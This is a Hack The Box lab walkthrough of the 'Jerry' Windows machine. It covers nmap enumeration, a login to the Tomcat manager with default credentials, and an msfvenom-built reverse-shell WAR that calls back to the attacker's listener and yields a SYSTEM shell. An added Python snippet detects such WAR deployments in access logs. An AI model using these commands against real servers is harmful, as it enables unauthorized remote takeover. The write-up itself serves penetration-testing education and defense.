Redhalo

Hack The Box walkthrough – Jerry machine

Today's machine is the first Windows HTB box on my blog, and probably the easiest one: Jerry.

Let's jump in!

Enumeration

Again, we start the enumeration phase with an nmap scan of the given IP address:

~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.79.3 Full
Running a Full scan on 10.129.79.3
Host is likely running Windows
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:27 EST
Initiating Parallel DNS resolution of 1 host. at 10:27
Completed Parallel DNS resolution of 1 host. at 10:27, 0.03s elapsed
Initiating Connect Scan at 10:27
Scanning 10.129.79.3 [65535 ports]
Discovered open port 8080/tcp on 10.129.79.3
Completed Connect Scan at 10:31, 262.72s elapsed (65535 total ports)
Nmap scan report for 10.129.79.3
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.79 seconds

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-10 10:31 EST
Nmap scan report for 10.129.79.3
Host is up (0.046s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds

As you can see, I am now getting used to nmapAutomator. It is very convenient and fast.

From the nmap results we can read that we are dealing with a Windows machine, and that only a Tomcat service (Apache Tomcat 7.0.88) is listening, on port 8080.

Tomcat Access

A few login attempts on the Tomcat Web Application Manager gave me access with the login/password combination tomcat/s3cret.

Privilege Escalation

Since I can deploy new applications through the manager, I am going to build my reverse shell as a malicious WAR file.

~/Documents$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.64 LPORT=4242 -f war -o revshell.war
WARN: Unresolved or ambiguous specs during Gem::Specification.reset:
      reline (>= 0)
      Available/installed versions of this gem:
      - 0.1.5
      - 0.1.3
WARN: Clearing out unresolved specs. Try 'gem cleanup '
Please report a bug if this causes problems.
Payload size: 1089 bytes
Final size of war file: 1089 bytes
Saved as: revshell.war

I just need to deploy it from the Tomcat Web Application Manager:

Then it is available as an application:

I ran my listener:

~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...

And triggered the payload by accessing the application at the URL http://IP:8080/revshell/

The shell spawned already with full rights on the machine, since Tomcat runs as NT AUTHORITY\SYSTEM:

~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.64] from (UNKNOWN) [10.129.79.3] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
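As an added defensive example (not part of the original walkthrough), here is detection logic for the manager-deployment path used above, run over constructed Tomcat access-log lines in the default AccessLogValve "common" pattern; the IPs, paths and timestamps in the sample are made up, and the set of known contexts is an assumption for this host.

```python
# Added example, not from the walkthrough: flag WAR deployments through the
# Tomcat Manager and requests served from contexts outside a known baseline.
import re

# Constructed sample lines (default Tomcat access log pattern: %h %l %u %t "%r" %s %b).
SAMPLE_LOG = """\
10.10.14.64 - - [10/Jan/2021:10:40:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.64 - tomcat [10/Jan/2021:10:40:09 -0500] "GET /manager/html HTTP/1.1" 200 19521
10.10.14.64 - tomcat [10/Jan/2021:10:41:02 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19800
10.10.14.64 - - [10/Jan/2021:10:41:20 -0500] "GET /revshell/ HTTP/1.1" 200 0
10.10.14.12 - - [10/Jan/2021:10:42:00 -0500] "GET /docs/ HTTP/1.1" 200 3100
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy code: the HTML upload form and the text (script) API.
DEPLOY_RE = re.compile(r'^/manager/(html/upload|text/deploy)(\?|$)')
# Assumed deployment baseline for this host; any other served context is suspicious.
KNOWN_CONTEXTS = {'manager', 'host-manager', 'docs', 'examples', 'ROOT'}


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze_access_log(text, known_contexts=KNOWN_CONTEXTS):
    """Return a list of (kind, client_ip, path) findings for the given log text."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path, status = rec['path'], rec['status']
        # 1) A successful deployment request through the manager (manager-gui/-script role).
        if DEPLOY_RE.match(path) and status.startswith('2'):
            findings.append(('war_deploy', rec['ip'], path))
            continue
        # 2) A 200 response served from a context that is not in the baseline.
        context = path.lstrip('/').split('/', 1)[0].split('?', 1)[0] or 'ROOT'
        if context not in known_contexts and status == '200':
            findings.append(('unknown_context', rec['ip'], path))
    return findings


if __name__ == '__main__':
    for kind, ip, path in analyze_access_log(SAMPLE_LOG):
        print(f'{kind:16} {ip:15} {path}')
```

Fed the sample, it reports the upload to /manager/html/upload and the first request to the new /revshell/ context, which are the two events worth alerting on; the 401 probing of /manager/html can be counted separately as a brute-force indicator.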